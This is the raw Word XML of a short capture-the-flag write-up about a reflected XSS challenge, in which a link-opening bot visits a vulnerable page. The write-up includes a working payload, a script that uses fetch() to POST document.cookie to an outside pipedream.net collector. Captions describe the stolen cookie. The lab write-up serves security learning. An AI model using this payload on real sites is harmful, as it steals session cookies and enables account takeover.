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D67B" w14:textId="4EFD2A0F" w:rsidR="00FC1A84" w:rsidRDefault="00FC1A84">
      <w:r>
        <w:t xml:space="preserve">The challenge has two separate webpages one which is vulnerable to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attacks and from which we must steal a cookie, and another where we can send links to be opened:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575A4B6D" w14:textId="77777777" w:rsidR="00FC1A84" w:rsidRDefault="00FC1A84" w:rsidP="00FC1A84">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1A84">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4ED2F7" wp14:editId="1487917E">
            <wp:extent cx="5943600" cy="177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211" w14:textId="5D6AEC3D" w:rsidR="00FC1A84" w:rsidRDefault="00FC1A84" w:rsidP="00FC1A84">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00C765DB">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> The first app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145C3C87" w14:textId="77777777" w:rsidR="00FC1A84" w:rsidRDefault="00FC1A84" w:rsidP="00FC1A84">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1A84">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="337B4278" wp14:editId="1AB1D32F">
            <wp:extent cx="4241800" cy="32479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807" cy="32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C383" w14:textId="67D0304A" w:rsidR="00FC1A84" w:rsidRDefault="00FC1A84" w:rsidP="00FC1A84">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00C765DB">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> Second app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B541952" w14:textId="5C4F63A1" w:rsidR="00FC1A84" w:rsidRPr="00FC1A84" w:rsidRDefault="00FC1A84" w:rsidP="00FC1A84">
      <w:r>
        <w:t xml:space="preserve">The input to be opened by it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F86060B" w14:textId="660D18DF" w:rsidR="00FC1A84" w:rsidRDefault="00FC1A84">
      <w:r w:rsidRPr="00FC1A84">
        <w:t>http://vanilla.hub/?name=&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FC1A84">
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC1A84">
        <w:t>'https://enzvin6fpk7xtu0.m.pipedream.net', {method: '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1A84">
        <w:t>POST',mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1A84">
        <w:t>: '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1A84">
        <w:t>no-c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1A84">
        <w:t>ors',body:document.cookie});&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F800E9D" w14:textId="0EBD6139" w:rsidR="00557A66" w:rsidRDefault="00557A66"/>
    <w:p w14:paraId="1247866D" w14:textId="5CFCB859" w:rsidR="00557A66" w:rsidRDefault="00557A66"/>
    <w:p w14:paraId="66390360" w14:textId="6AE0AC07" w:rsidR="00557A66" w:rsidRDefault="00557A66">
      <w:r>
        <w:t>https://enqmimydnbiuecc.m.pipedream.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584B5022" w14:textId="77777777" w:rsidR="004D36C3" w:rsidRDefault="004D36C3" w:rsidP="004D36C3">
      <w:r>
        <w:t xml:space="preserve">For the purpose of this challenge </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="DCDDDE"/>
          <w:shd w:val="clear" w:color="auto" w:fill="36393F"/>
        </w:rPr>
        <w:t>request.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59507391" w14:textId="5C4E081C" w:rsidR="004D36C3" w:rsidRDefault="004D36C3"/>
    <w:p w14:paraId="612845DA" w14:textId="77777777" w:rsidR="004D36C3" w:rsidRDefault="00FC1A84" w:rsidP="004D36C3">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1A84">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="589090B7" wp14:editId="3D0CAE99">
            <wp:extent cx="3689350" cy="3232912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355" cy="32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DFFC" w14:textId="2CCD4E2F" w:rsidR="00FC1A84" w:rsidRDefault="004D36C3" w:rsidP="004D36C3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00C765DB">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> this is the stolen cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EB958B" w14:textId="77777777" w:rsidR="00C765DB" w:rsidRDefault="00C765DB" w:rsidP="00C765DB">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C765DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="414A51C8" wp14:editId="4ADF641F">
            <wp:extent cx="5943600" cy="174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BC43" w14:textId="6A5C09AC" w:rsidR="004D36C3" w:rsidRDefault="00C765DB" w:rsidP="00C765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Vulnerable code in the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0F7303" w14:textId="77777777" w:rsidR="00C765DB" w:rsidRPr="00C765DB" w:rsidRDefault="00C765DB" w:rsidP="00C765DB"/>
    <w:p w14:paraId="56746C03" w14:textId="77777777" w:rsidR="00C765DB" w:rsidRDefault="00C765DB" w:rsidP="00C765DB">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C765DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A9FC68E" wp14:editId="260EF630">
            <wp:extent cx="3752850" cy="18411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626" cy="18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9A0F" w14:textId="6A31F22C" w:rsidR="00FC1A84" w:rsidRDefault="00C765DB" w:rsidP="00C765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Docker config hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1924815E" w14:textId="2FEEB581" w:rsidR="00C765DB" w:rsidRPr="00C765DB" w:rsidRDefault="00C765DB" w:rsidP="00C765DB">
      <w:r>
        <w:t xml:space="preserve">Because the get request to the 3002 app will echo it to the page Reflected XSS is possible.  The bot on </w:t>
      </w:r>
      <w:r w:rsidR="00CE1A52">
        <w:t xml:space="preserve">3003 will open our request with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE1A52">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE1A52">
        <w:t xml:space="preserve"> and we steal the cookie and then boom we’re done.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C765DB" w:rsidRPr="00C765DB" w:rsidSect="009A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ABE"/>
    <w:rsid w:val="004D36C3"/>
    <w:rsid w:val="00557A66"/>
    <w:rsid w:val="0064013E"/>
    <w:rsid w:val="00697ABE"/>
    <w:rsid w:val="0096422B"/>
    <w:rsid w:val="009A56B4"/>
    <w:rsid w:val="00C765DB"/>
    <w:rsid w:val="00CE1A52"/>
    <w:rsid w:val="00F03974"/>
    <w:rsid w:val="00F53E7E"/>
    <w:rsid w:val="00F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991B"/>
  <w15:docId w15:val="{A22DAD31-67C0-4923-BC94-572C9D3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1A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A6C-90C5-4CE9-837E-46429C0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 Stefan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dascalu Stefan</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-03T20:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-12T16:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>